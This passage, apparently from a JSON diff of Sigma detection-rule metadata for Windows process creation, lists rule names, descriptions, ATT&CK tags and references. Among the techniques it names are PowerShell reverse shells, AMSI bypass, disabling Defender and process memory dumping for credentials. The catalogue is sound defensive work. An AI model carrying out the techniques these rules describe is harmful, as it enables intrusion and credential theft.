"uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "value": "Suspicious Execution Of PDQDeployRunner", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1550483085472432128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/22", - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the PDQDeploy tool to execute these commands" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of PDQ Deploy remote admin tool", - "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "value": "Use of PDQ Deploy Remote Adminstartion Tool", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", - "https://www.pdq.com/pdq-deploy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_pdq_deploy.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", - "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", - "value": "Persistence Via TypedPaths - CommandLine", - "meta": { - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_persistence_typed_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "value": "Pingback Backdoor", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "proc_creation_win_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", - "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", - "value": "Executable Used by PlugX in Uncommon Location", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", - 
"https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" - ], - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/06/12", - "filename": "proc_creation_win_plugx_susp_exe_locations.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "value": "Possible Privilege Escalation via Service Permissions Weakness", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", - "author": "Teymur Kheirkhabarov", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", - "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "value": "Powershell AMSI Bypass via .NET Reflection", - "meta": { - "refs": [ - "https://twitter.com/mattifestation/status/735261176745988096", - 
"https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2018/08/17", - "filename": "proc_creation_win_powershell_amsi_bypass.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects audio capture via PowerShell Cmdlet.", - "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", - "value": "Audio Capture via PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_powershell_audio_capture.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate audio capture by legitimate user." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Base64 encoded Shellcode", - "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "value": "PowerShell Base64 Encoded Shellcode", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2018/11/17", - "filename": "proc_creation_win_powershell_b64_shellcode.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", - "uuid": "74403157-20f5-415d-89a7-c505779585cf", - "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the PowerShell command lines with reversed strings", - "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "value": "Suspicious PowerShell Cmdline", - "meta": { - "refs": [ - 
"https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the PowerShell command lines with special characters", - "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "value": "Suspicious PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", - "level": "high", - "falsepositive": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "value": "Encoded PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", 
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "low", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", - "value": "Suspicious Xor PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/07/06", - "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", - "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", - "value": "Powershell Defender Base64 MpPreference", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/04", - "filename": "proc_creation_win_powershell_defender_base64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", - "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", - "value": "Powershell Defender Disable Scan Feature", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", - "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/03", - "filename": "proc_creation_win_powershell_defender_disable_feature.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "uuid": 
"17769c90-230e-488b-a463-e05c08e9d48f", - "value": "Powershell Defender Exclusion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/04/29", - "filename": "proc_creation_win_powershell_defender_exclusion.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", - "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "value": "Detection of PowerShell Execution via DLL", - "meta": { - "refs": [ - "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2018/08/25", - "filename": "proc_creation_win_powershell_dll_execution.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "uuid": "b3512211-c67e-4707-bedc-66efc7848863", - "value": "PowerShell 
Downgrade Attack", - "meta": { - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/03/20", - "filename": "proc_creation_win_powershell_downgrade_attack.yml", - "author": "Harish Segar (rule)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Powershell process that contains download commands in its command line string", - "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "value": "PowerShell Download from URL", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_powershell_download.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "value": "Suspicious PowerShell Download and Execute Pattern", - "meta": { - "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/02/28", - "filename": "proc_creation_win_powershell_download_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers that pull packages from remote systems and execute them" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious FromBase64String expressions in command line arguments", - "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", - "value": "FromBase64String Command Line", - "meta": { - "refs": [ - "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" - ], - "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" - ], - "creation_date": "2020/01/29", - "filename": "proc_creation_win_powershell_frombase64string.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative script libraries" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", - "value": "PowerShell Get-Clipboard Cmdlet Via CLI", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2020/05/02", - "filename": 
"proc_creation_win_powershell_get_clipboard.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "value": "Execution of Powershell Script in Public Folder", - "meta": { - "refs": [ - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/06", - "filename": "proc_creation_win_powershell_public_folder.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", - "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "value": "Powershell Reverse Shell Connection", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", - "author": "FPT.EagleEye, wagga", - "level": "high", - "falsepositive": [ - "Administrative might use this function for checking network connectivity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects adding and using 
Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", - "uuid": "25676e10-2121-446e-80a4-71ff8506af47", - "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_powershell_snapins_hafnium.yml", - "author": "FPT.EagleEye", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "uuid": "36210e0d-5b19-485d-a087-c096088885f0", - "value": "Suspicious PowerShell Parameter Substring", - "meta": { - "refs": [ - "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", - "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", - 
"value": "Suspicious XOR Encoded PowerShell Command Line", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" - ], - "creation_date": "2018/09/05", - "filename": "proc_creation_win_powershell_xor_commandline.yml", - "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", - "value": "Default PowerSploit and Empire Schtasks Persistence", - "meta": { - "refs": [ - "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2018/03/06", - "filename": "proc_creation_win_powersploit_empire_schtasks.yml", - "author": "Markus Neis, @Karneades", - "level": "high", - "falsepositive": [ - "False positives are possible, depends on organisation and processes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and 
delete the driver files", - "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", - "value": "PowerTool Execution", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/11/29", - "filename": "proc_creation_win_powertool_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "value": "Privilege Escalation via Named Pipe Impersonation", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the SysInternals Procdump utility", - "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "value": "Procdump Usage", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2021/08/16", - "filename": "proc_creation_win_procdump.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate use of procdump by a developer or administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", - "value": "Procdump Evasion", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1480785527901204481", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" - ], - 
"tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_procdump_evasion.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Cases in which procdump just gets copied to a different directory without any renaming" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "value": "Process Dump via RdrLeakDiag.exe", - "meta": { - "refs": [ - "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/09/24", - "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", - "author": "Cedric MAURUGEON", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", - "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", - "value": "Process Dump via Rundll32 and Comsvcs.dll", - "meta": { - "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", - "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://twitter.com/Wietze/status/1542107456507203586", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" - ], - "tags": [ 
- "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], - "creation_date": "2020/02/18", - "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", - "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Unlikely, because no one should dump the process memory in that way" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "value": "CreateDump Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://twitter.com/bopin2020/status/1366400799199272960", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_proc_dump_createdump.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Command lines that use the same flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Visual Studio 